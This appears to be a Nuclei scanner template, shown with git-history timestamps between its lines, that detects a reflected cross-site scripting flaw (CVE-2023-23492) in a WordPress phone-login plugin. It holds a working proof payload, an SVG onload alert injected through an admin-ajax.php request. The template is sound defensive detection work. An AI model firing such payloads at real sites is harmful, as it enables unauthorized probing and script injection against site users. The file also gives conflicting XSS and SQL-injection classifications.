2023-03-05 13:42:10 +00:00
id : CVE-2023-23492
info :
name : Login with Phone Number - Cross-Site Scripting
author : r3Y3r53
2023-03-17 17:31:47 +00:00
severity : high
2023-03-05 13:42:10 +00:00
description : |
Login with Phone Number, versions < 1.4.2, is affected by an reflected XSS vulnerability in the login-with-phonenumber.php' file in the 'lwp_forgot_password()' function.
2023-03-17 14:06:27 +00:00
Note that CVE-2023-23492 incorrectly describes and scores this as SQL injection vulnerability.
2023-03-05 13:42:10 +00:00
reference :
- https://wordpress.org/plugins/login-with-phone-number/
- https://www.tenable.com/security/research/tra-2023-3
- https://nvd.nist.gov/vuln/detail/CVE-2023-23492
classification :
2023-03-17 17:31:47 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score : 8.8
2023-03-05 13:42:10 +00:00
cve-id : CVE-2023-23492
2023-03-17 17:31:47 +00:00
cwe-id : CWE-89
2023-03-05 13:42:10 +00:00
metadata :
verified : "true"
2023-03-05 14:19:20 +00:00
tags : login-with-phonenumber,wordpress,wp,wp-plugin,xss,tenable,cve,cve2023
2023-03-05 13:42:10 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=lwp_forgot_password&ID=<svg%20onload=alert(document.domain)>"
matchers-condition : and
matchers :
- type : word
part : body
words :
- '<svg onload=alert(document.domain)>'
- 'message":"Update password'
condition : and
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2023-03-17 14:00:49 +00:00
# Enhanced by cs on 2023/03/17